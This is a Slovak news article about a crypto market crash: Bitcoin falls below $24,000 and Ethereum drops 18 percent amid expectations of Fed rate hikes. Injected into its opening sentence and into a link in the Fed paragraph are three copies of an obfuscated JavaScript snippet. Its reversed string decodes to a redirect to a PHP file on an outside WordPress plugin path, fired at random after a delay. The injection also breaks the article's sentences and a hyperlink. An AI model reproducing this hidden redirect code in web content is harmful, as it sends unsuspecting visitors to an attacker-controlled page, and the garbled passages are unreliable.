Hodnota kryptomenových trhov sa <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dostala pod jeden bilión <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dolárov.

Kryptomenové trhy dramaticky padajú. Cena Bitcoinu klesla najnižšie od decembra 2020

Hodnota kryptomenových trhov sa dostala pod jeden bilión dolárov. Z populárnych digitálnych mien výpredaj najviac zasiahol Ethereum, ktoré počas pondelňajšieho obchodovania odpísalo cez 18 percent svojej hodnoty.

Hodnota Etherea

Dolárová hodnota meny Ethereum sa dostala na najnižšiu úroveň od vlaňajšieho januára, keď sa v pondelok obchodovalo len tesne nad hranicou 1200 dolárov. Bitcoin sa počas jediného dňa prepadol o viac ako 15 percent a jeho kurz sa dostal pod 24-tisíc dolárov. Takto lacný bol Bitcoin naposledy v decembri 2020. Odvtedy sa mu podarilo svoju hodnotu prakticky strojnásobiť, kedy sa o necelý rok neskôr priblížil na dohľad 70-tisícovej méte.

Prodej kryptoměn

K výpredaji kryptomien došlo v reakcii na silnejúce očakávania investorov, že americká centrálna banka ($mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolar-je-voci-kosu-mien-najsilnejsi-za-posledne-dva-roky-aj-vdaka-spekulaciam-co-urobi-fed/“>Fed) bude ďalej uťahovať svoju menovú politiku v podobe rastu úrokových sadzieb. Fed tak bude reagovať na nečakane vysokú májovú infláciu, ktorá dosiahla 8,6 percenta v medziročnom porovnaní. Kryptomeny tak strácajú svoju atraktivitu. Predovšetkým preto, že ide o jedno z najrizikovejších aktív, ktoré ale momentálne de facto neprináša žiadne zhodnotenie.

2 komentáre

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *